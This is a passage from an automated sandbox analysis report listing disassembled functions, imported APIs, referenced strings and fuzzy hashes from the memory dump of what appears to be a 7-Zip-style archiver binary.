Instruction Fuzzy Hash: 77F09036D00119ABCB05BB98ED02A9EBF76FFD5320F004027F505232A1DB755A65DEC0

Uniqueness

Uniqueness Score: -1.00%

Function 009F2B6F Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 443COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009F2B74

Part of subcall function 009EEFE3: __EH_prolog.LIBCMT ref: 009EEFE8

Part of subcall function 00A16B33: _CxxThrowException.MSVCRT(?,00A4FFC8), ref: 00A16B59

Part of subcall function 009F6287: __EH_prolog.LIBCMT ref: 009F628C

Part of subcall function 009F315C: __EH_prolog.LIBCMT ref: 009F3161

Part of subcall function 009F255B: __EH_prolog.LIBCMT ref: 009F2560
Part of subcall function 009F255B: strcmp.MSVCRT ref: 009F2614

Strings

Scanning error, xrefs: 009F2C80

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$ExceptionThrowstrcmp
String ID: Scanning error
API String ID: 1140649431-2691707340
Opcode ID: b20e8cde624fd2575a10adce855a5d026acaf73c5f2df9c5f80f250f1fb83751
Instruction ID: 988d904ede92b8a72ac5eae895925be8528b67a64e80805f690099a9c291d7c5
Opcode Fuzzy Hash: b20e8cde624fd2575a10adce855a5d026acaf73c5f2df9c5f80f250f1fb83751
Instruction Fuzzy Hash: 54028871D04259DFCF15DFA4C884BEDBBB4BF58310F18809AE946AB292CB349E44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009EA544 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 284COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009EA549

Part of subcall function 00A37E10: _beginthreadex.MSVCRT ref: 00A37E24

__aulldiv.LIBCMT ref: 009EA804

Strings

, xrefs: 009EA6B2

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog__aulldiv_beginthreadex
String ID:
API String ID: 2901374343-3916222277
Opcode ID: c28d391fde5ff692abc3c93281f5e4c5257530da3a616ad8d6a10a6e9bbeeced
Instruction ID: 91d2fec9d53e2a9f0834a88eb912804a6a3fe8467972f79ffdd96023215e688b
Opcode Fuzzy Hash: c28d391fde5ff692abc3c93281f5e4c5257530da3a616ad8d6a10a6e9bbeeced
Instruction Fuzzy Hash: 19B15BB1D00249DFCB25DFA6C9819AEFBB5FF88310F24852DE41AA7261D730AE41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009F8303 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009F8308

Part of subcall function 009D9312: VariantClear.OLEAUT32(?), ref: 009D9334

Strings

Unknown error, xrefs: 009F8424, 009F8429
Unknown warning, xrefs: 009F8485, 009F848A

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ClearH_prologVariant
String ID: Unknown error$Unknown warning
API String ID: 1166855276-4291957651
Opcode ID: 510af7db0cb6e7bd2490cbf518cb3575fedeb471052b70a3e7907cf7767697ec
Instruction ID: b24d0b93f4ed21ff3296e880dc94405f6061ae5102216817eb206abf5f001bcc
Opcode Fuzzy Hash: 510af7db0cb6e7bd2490cbf518cb3575fedeb471052b70a3e7907cf7767697ec
Instruction Fuzzy Hash: CA813B71900709DFCB54DFA9C580AEEB7F5BF48304F50896EE156A72A1DB74AE08CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A1F036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A1F03B
__aullrem.LIBCMT ref: 00A1F1F3

Strings

wav, xrefs: 00A1F10B

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog__aullrem
String ID: wav
API String ID: 3415659256-1803495720
Opcode ID: 107667d3faa0360afb92476ae15533b9823d8382357ebac3326e62f86ea5bc27
Instruction ID: 1d9f949cf7893a4ede4a778b0daa0865e380257d41bacb396ca7eec892778a75
Opcode Fuzzy Hash: 107667d3faa0360afb92476ae15533b9823d8382357ebac3326e62f86ea5bc27
Instruction Fuzzy Hash: 4861AF35A00289DFDF21CF94C940BEEB7F1AF49355F248169E904AB242D771DE85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A0F752 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A0F757

Strings

@, xrefs: 00A0F8E0
crc, xrefs: 00A0F809

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID: @$crc
API String ID: 3519838083-849529298
Opcode ID: 684d7eaa665d2e3efa94cc8a105fa96a0c357dfb641f2a0d9d8c357118c751ba
Instruction ID: 7cd2362e515ca880c9056ed519b240b6dcc16a77302564ef9aea93a8c5941a1c
Opcode Fuzzy Hash: 684d7eaa665d2e3efa94cc8a105fa96a0c357dfb641f2a0d9d8c357118c751ba
Instruction Fuzzy Hash: 69514B75D40209AFCF20EFA0E881AEEB775BF84350F14C43AE81277691DB34AA49CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A11E40 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A11E45

Strings

BlockUnpackSize, xrefs: 00A11EF1
BlockPackSize, xrefs: 00A11EDF

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID: BlockPackSize$BlockUnpackSize
API String ID: 3519838083-5494122
Opcode ID: a048e162a3f9956afb0a716da5a22f26b5760b319cd198efeb57080907a59d96
Instruction ID: 4bec8e01a33a429b21e3a16db6add06a986b3600013633c159c877417004ac2e
Opcode Fuzzy Hash: a048e162a3f9956afb0a716da5a22f26b5760b319cd198efeb57080907a59d96
Instruction Fuzzy Hash: B851C0318042459EDF39DBA484A0BFDBBB1AF19300F28856BD296571A1D7319ED8EB01

Uniqueness

Uniqueness Score: -1.00%

Function 009E22C8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E22CD
_CxxThrowException.MSVCRT(?,00A51428), ref: 009E24A5

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Strings

incorrect update switch command, xrefs: 009E2492

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ExceptionH_prologThrowfree
String ID: incorrect update switch command
API String ID: 2564996034-2497410926
Opcode ID: ffbe02f5812c7e7f48750753db1e51dd323bfa0b6f21ed7d31b1a380f9a2f5bd
Instruction ID: c17bff083af5a71ee703165166d7087a2df14f5387bc4ffac4a221b910a164e2
Opcode Fuzzy Hash: ffbe02f5812c7e7f48750753db1e51dd323bfa0b6f21ed7d31b1a380f9a2f5bd
Instruction Fuzzy Hash: 00516A32D00259EBCF16EB94D841BEDBBB9BF84310F20819AE411772E1DB746E45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009EDF2D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009EDF32

Part of subcall function 009EE0BD: __EH_prolog.LIBCMT ref: 009EE0C2

Strings

AES128, xrefs: 009EDF6E
AES192, xrefs: 009EDF85

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID: AES128$AES192
API String ID: 3519838083-2727009373
Opcode ID: 222b240c6c8fdfeb92024a3dd818a21ac07146bd2e12e42032f98a8d97397d89
Instruction ID: 197206f7f79cfe15364e5206784f7767c10871e311b3659fc8605fd215d0ebe9
Opcode Fuzzy Hash: 222b240c6c8fdfeb92024a3dd818a21ac07146bd2e12e42032f98a8d97397d89
Instruction Fuzzy Hash: 1551AD71910248AFDF26EF95C981AEDFBB5BF98300F10862EE45667391CB719E04CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009F55DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121stringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009F55E3
strcmp.MSVCRT ref: 009F5674

Strings

= , xrefs: 009F56E8

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prologstrcmp
String ID: =
API String ID: 1490138475-2525689732
Opcode ID: 31a75fc8eec5aa3a46728a2b2faf2dd2ec87b761b00aa9958b6dae0fc94a0069
Instruction ID: 9791615daeba703b1232df0292a8bdf2d59f52baf8de0e6ceaa47f3e85f06ab1
Opcode Fuzzy Hash: 31a75fc8eec5aa3a46728a2b2faf2dd2ec87b761b00aa9958b6dae0fc94a0069
Instruction Fuzzy Hash: 3641BC31A84649ABDF05FBA0C856BBE7BB2AFD5300F04801AF6026B2E2CF614D45DB51

Uniqueness

Uniqueness Score: -1.00%

Function 009DA0B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009DA0BB

Part of subcall function 009D9F47: __EH_prolog.LIBCMT ref: 009D9F4C

Part of subcall function 009D99D7: GetSystemInfo.KERNEL32(?), ref: 009D99F9
Part of subcall function 009D99D7: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 009D9A13
Part of subcall function 009D99D7: GetProcAddress.KERNEL32(00000000), ref: 009D9A1A

strcmp.MSVCRT ref: 009DA127

Strings

- , xrefs: 009DA137

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$AddressHandleInfoModuleProcSystemstrcmp
String ID: -
API String ID: 2798778560-3695764949
Opcode ID: 7aa748e70e8be140cf2821ebccfd21680c79541baac1f0854ce43e0c84f83583
Instruction ID: 5f95350ff220a3532bb9686e0846bc4bf060d69498486908841637d2f872d9ae
Opcode Fuzzy Hash: 7aa748e70e8be140cf2821ebccfd21680c79541baac1f0854ce43e0c84f83583
Instruction Fuzzy Hash: 02314731C85209ABCF15FBE0D952AEDB779AFA4700F10801BF40172391DB319A48DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 009D4DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

wcscmp.MSVCRT ref: 009D4E08
wcscmp.MSVCRT ref: 009D4E1D

Strings

UNC, xrefs: 009D4E41

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: wcscmp
String ID: UNC
API String ID: 3392835482-337201128
Opcode ID: 9d9ee409a60b0b4c80fdbc2c1652c1e8ba9bd49cb3af9aae8b94a213bd306737
Instruction ID: e98867095b52bc954cfb8a46808cc22b13eae60fe5e6fbfef79a7c1d02fb5ca3
Opcode Fuzzy Hash: 9d9ee409a60b0b4c80fdbc2c1652c1e8ba9bd49cb3af9aae8b94a213bd306737
Instruction Fuzzy Hash: 4F213D39380200EFC724CF58D994A26B3E9FB99B50B29C86BE6558F391C631EC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009F3D3B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75stringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009F3D40
strlen.MSVCRT ref: 009F3DA7

Strings

sums, xrefs: 009F3DAD

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prologstrlen
String ID: sums
API String ID: 1633371453-329994169
Opcode ID: d90dbc32b6822981ba05f6a803309e7f4eddb042ed6298d325bbdcd41ee94f45
Instruction ID: a4d68c36fae0010a8be7ebdf45d3c0a19ba7ae65e6bbbc51c8ab987e086ec06a
Opcode Fuzzy Hash: d90dbc32b6822981ba05f6a803309e7f4eddb042ed6298d325bbdcd41ee94f45
Instruction Fuzzy Hash: 3421DE32D44218ABCF04EBA8E551BEDB7B9AFE4300F14805BE50277392CB755E45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B6AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00A0B6F2
strlen.MSVCRT ref: 00A0B718

Strings

M, xrefs: 00A0B706

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: __aulldivstrlen
String ID: M
API String ID: 1892184250-3664761504
Opcode ID: 09a60940a3f7c14381204f1e3f649e5e64339269a50027163c06437c1d688add
Instruction ID: b5fbb44a939a2ab074516b1bc72bb66dfc3b68bc9883c03700e08bce4d5364fd
Opcode Fuzzy Hash: 09a60940a3f7c14381204f1e3f649e5e64339269a50027163c06437c1d688add
Instruction Fuzzy Hash: B2110A716543489FDB25EBB9DA91FAEB7E99BD8314F14483EE283971C1DA31AC058330

Uniqueness

Uniqueness Score: -1.00%

Function 009E2635 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E263A
_CxxThrowException.MSVCRT(?,00A51428), ref: 009E26D7

Strings

Unsupported charset:, xrefs: 009E26C4

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ExceptionH_prologThrow
String ID: Unsupported charset:
API String ID: 461045715-616772432
Opcode ID: 0ba1d276d83a3e071d7300778a3acd5b19f5a7d3c2c7efa7abff186c5d19cf9a
Instruction ID: 08d39262e34dab195cd67e8cb99b6c553164fbb066efdde98c4da9161b690e2d
Opcode Fuzzy Hash: 0ba1d276d83a3e071d7300778a3acd5b19f5a7d3c2c7efa7abff186c5d19cf9a
Instruction Fuzzy Hash: 45213572A401099FCF01EF98C881AEDB779FFC9714F00826AF9152B251CB31AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A04F70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A04F75

Strings

0, xrefs: 00A04FE2
x, xrefs: 00A04FE6

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID: 0$x
API String ID: 3519838083-1948001322
Opcode ID: b8c4202d41c9acbbdaf8487adf4e2a68087260d80591b5865242ac9d132f5632
Instruction ID: 0d8d9cca49664d8c36c44e3188d5fc91c26382700693480daa840b88d8438a8b
Opcode Fuzzy Hash: b8c4202d41c9acbbdaf8487adf4e2a68087260d80591b5865242ac9d132f5632
Instruction Fuzzy Hash: F0214976D4111E9BCF04EBE4E581AEDB7B5AF98704F20405BE50177281DB756E04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A08DDC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00A08E21

Strings

S, xrefs: 00A09A64
Decoding ERROR, xrefs: 00A08E1C

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs
String ID: Decoding ERROR$S
API String ID: 1795875747-3281273935
Opcode ID: b2fbbb5223207bc2558a649670fe5b189721596aabf0456865a7b4ae8636569b
Instruction ID: 0b82a736cf1253fd8e6ae5020a7be074241c74ed63e2bd67d5891b1ce26b6d17
Opcode Fuzzy Hash: b2fbbb5223207bc2558a649670fe5b189721596aabf0456865a7b4ae8636569b
Instruction Fuzzy Hash: 6B21BD71E00218DFDF15EB94E985BDCBBB1BB98310F1482AAE415A72D2DB341E85CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00A19355 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A1935A

Strings

LZMA, xrefs: 00A19381
BT2, xrefs: 00A19396

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID: BT2$LZMA
API String ID: 3519838083-1343681682
Opcode ID: fa3071fdb9e84291d03bdc5ffd854a1928750edd23419f7c4ced0a0bcb4d87ee
Instruction ID: f33419bb017c1be40aee53d00fd2eb5fd7bdad4b8a53db51129f44e7f8adb8d6
Opcode Fuzzy Hash: fa3071fdb9e84291d03bdc5ffd854a1928750edd23419f7c4ced0a0bcb4d87ee
Instruction Fuzzy Hash: 5C118F71A64214BED718FBA4CD52FDDB770BF54B00F008069F112671E2EBB06A48CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009E9FC9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E9FCE

Strings

/ , xrefs: 009EA004, 009EA009, 009EA039
: , xrefs: 009EA020

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID: / $ :
API String ID: 3519838083-1815150141
Opcode ID: cc89faf0c8f763b87c822bd8d5d8d67b10dda8f46784178f206913dc6c279a08
Instruction ID: 9c4921b5fe017608773216fea511c5044d05ce0bb56a23721b1ed3c920eec44a
Opcode Fuzzy Hash: cc89faf0c8f763b87c822bd8d5d8d67b10dda8f46784178f206913dc6c279a08
Instruction Fuzzy Hash: 2311F832950119DBDF15EFD4D992FEEB3B4BFA9300F10441AE112762A1DB78AA04CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009E3AF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E3AFD
GetLastError.KERNEL32 ref: 009E3B09

Strings

: , xrefs: 009E3B29

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ErrorH_prologLast
String ID: :
API String ID: 1057991267-3653984579
Opcode ID: 762416771dbfab10f130bbd1220d40eb43d5c28b22a35132d8138745690efedc
Instruction ID: 8a75a28d1594ccd1dcddc51235d034fce87ddc0f725642bf0ad714b47c70b613
Opcode Fuzzy Hash: 762416771dbfab10f130bbd1220d40eb43d5c28b22a35132d8138745690efedc
Instruction Fuzzy Hash: 7311A176D50205EBCB06EBA4D816BEEBB75EFD4311F10806AF401A3291CB709E05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A074B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00A07504

Strings

Cannot open encrypted archive. Wrong password?, xrefs: 00A074C7
Cannot open the file as archive, xrefs: 00A074FF

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

